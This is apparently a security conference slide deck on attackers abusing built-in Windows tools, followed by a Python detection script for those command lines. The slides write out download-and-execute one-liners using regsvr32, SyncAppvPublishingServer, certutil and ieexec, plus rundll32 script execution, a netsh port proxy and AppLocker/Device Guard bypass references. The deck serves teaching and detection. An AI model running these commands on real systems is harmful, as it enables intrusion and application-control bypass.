Hacking Windows with Windows – Advanced attacks
MTUG 10.09.2017
WHOAMI
• Geek/Pentester/Security researcher/IT-Pro/MVP/Speaker
• Worked in IT since 2000
• First MCP when I was 16
• Work @ Advania – Chief Technical Architect
• Married/kids/dog
• Blog: http://oddvar.moe
• Twitter: @oddvarmoe
Attacks – How to gain initial access
• Traditional attack
• Send email
• Link
• Attachment
• Phishing page
• External server
• OWA
• ADFS
• Skype
• Third party
Need more examples?
• https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&cid=C96A3EEDCE316E4C&id=C96A3EEDCE316E4C%21114&parId=C96A3EEDCE316E4C%21109&o=OneUp
Call to Action!
• Setting in Office (2013/2016)
What is behind Enable Content?
• This is where it gets interesting
• What do they do?
• We will look at a number of examples
• Real attacks
• «Future attacks»
What do you mean by «Hacking Windows with Windows»
• Attackers have shifted focus
• They use Windows functionality to carry out attacks
• They abuse approved tools
• No longer malware.exe
REGSVR32.exe
• regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
• Proxy aware
REGSVR32.exe
• Calculator:
• regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct scrobj.dll
rundll32.exe
• rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('User%20Group%20Agder');
• (Now caught by Windows Defender)
• Detailed explanation: https://stackoverflow.com/questions/25131484/rundll32-exe-javascript
Rundll32.exe
• Calculator:
• rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
SyncAppvPublishingServer.exe
• SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
• Command injection flaw
SyncAppvPublishingServer.exe
• Calculator:
• SyncAppvPublishingServer.exe "n;(calc)
• cmd.exe /c cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'"
• Proof that it is PowerShell:
• SyncAppvPublishingServer.exe "n;(get-service | out-gridview)
Certutil.exe
• certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe
• certutil.exe /decode base64kodetfil.txt x64.dll
• certutil -Class scrobj.dll
Some others without a demo
• msbuild.exe pshell.xml
• regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
• regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
• InstallUtil.exe /logfile= /LogToConsole=false /U MYDLL.dll
• msxsl.exe customers.xml script.xsl
My research
• BGINFO.exe
bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Video: https://youtu.be/OiKhgSxWKUM
• CMSTP.exe
UAC bypass and DLL loading
https://msitpros.com/wp-content/uploads/2017/08/WebDavDLLLoadBlog.gif
My research
• CVE-2017-8625
• hh.exe /? (What do you think this one does?)
• Device Guard bypass
• https://msitpros.com/wp-content/uploads/2017/08/CVE-2017-8625.gif
Code in code
EXE files that can start other EXE files
• Examples:
• scriptrunner.exe -appvscript calc.exe
• forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
• ieexec.exe http://x.x.x.x:8080/bypass.exe (.NET exe)
• bash.exe -c calc.exe (Linux in Windows)
Proxy
• netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112
What should you do?
• Application whitelisting
• Device Guard
• AppLocker
• Remember my AppLocker bypass list:
• https://github.com/api0cradle/UltimateAppLockerByPassList
• Implement detection (Splunk / WDATP / ATA)
EVEN THOUGH YOU CAN ROB A BANK
WITH PEN AND PAPER,
THAT DOES NOT MEAN YOU SHOULD NOT
HAVE A VAULT!
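One way to start on the detection bullet, as an added example that is not part of the original deck: a small matcher that flags process-creation command lines shaped like the ones on the slides and raises severity when the parent is an Office application (the "Enable Content" path). The event field names (`host`, `parent`, `cmdline`), the rule names and the sample events are constructed for illustration; map them to whatever your process-creation telemetry provides.

```python
import re

# Added example. Rule names and event field names are hypothetical; the
# patterns mirror command shapes from the slides and are not exhaustive.
RULES = [
    ("regsvr32 remote scriptlet", r"\bregsvr32(\.exe)?\b.*/i:\s*https?://.*\bscrobj\.dll"),
    ("rundll32 javascript handler", r"\brundll32(\.exe)?\b.*\bjavascript:"),
    ("SyncAppvPublishingServer command injection", r"\bsyncappvpublishingserver(\.exe|\.vbs)?\b.*;"),
    ("certutil download", r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://"),
    ("certutil decode", r"\bcertutil(\.exe)?\b.*[-/]decode\b"),
    ("bginfo config from UNC path", r"\bbginfo(\.exe)?\s+\\\\"),
    ("forfiles launching a command", r"\bforfiles(\.exe)?\b.*\s/c\s"),
    ("netsh portproxy added", r"\bnetsh(\.exe)?\b.*\bportproxy\s+add\b"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

# Office applications whose child processes deserve extra attention.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def classify(event):
    """Return (matched rule names, spawned_by_office) for one process event."""
    cmdline = event.get("cmdline", "")
    hits = [name for name, rx in COMPILED if rx.search(cmdline)]
    # Reduce the parent image path to its lower-cased file name.
    parent = event.get("parent", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return hits, parent in OFFICE_PARENTS

def scan(events):
    """Return one alert dict for every event that matches at least one rule."""
    alerts = []
    for ev in events:
        hits, office = classify(ev)
        if hits:
            alerts.append({"host": ev["host"], "rules": hits,
                           "severity": "high" if office else "medium"})
    return alerts

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll"},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"regsvr32 /s C:\Windows\System32\scrobj.dll"},
    {"host": "ws03", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.com/a.exe a.exe"},
    {"host": "ws04", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -store My"},
    {"host": "srv01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=9999 "
                "listenaddress=0.0.0.0 connectport=445 connectaddress=192.0.2.10"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The two benign events (local `scrobj.dll` registration, `certutil -store`) produce no alert, which is the baseline to tune against before adding such rules to a SIEM.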
SHAMELESS PLUG!
Thank you!
